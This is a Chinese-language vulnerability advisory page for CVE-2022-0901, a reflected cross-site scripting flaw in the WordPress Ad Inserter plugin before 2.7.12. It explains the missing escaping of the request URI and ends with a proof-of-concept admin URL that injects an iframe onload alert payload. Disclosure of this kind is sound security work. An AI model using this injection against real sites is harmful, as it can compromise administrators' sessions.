WordPress插件Ad Inserter 2.7.12反射式跨站点脚本XSS漏洞CVE-2022-0901

漏洞描述

插件在将请求URI输出回管理页面之前,不会对其进行清理和转义,从而导致在不编码字符的浏览器中产生反映的跨站点脚本
 


 

影响插件

ad-inserter < 2.7.12
ad-inserter-pro < 2.7.12
 


 

漏洞复现

在不编码字符的浏览器中:

https://example.com/wp-admin/options-general.php?page=ad-inserter.php&start=2&tab="><iframe/onload=alert(1)></iframe>
------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞7赞赏 分享
评论 共2条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像擦死0
    • 头像韩的0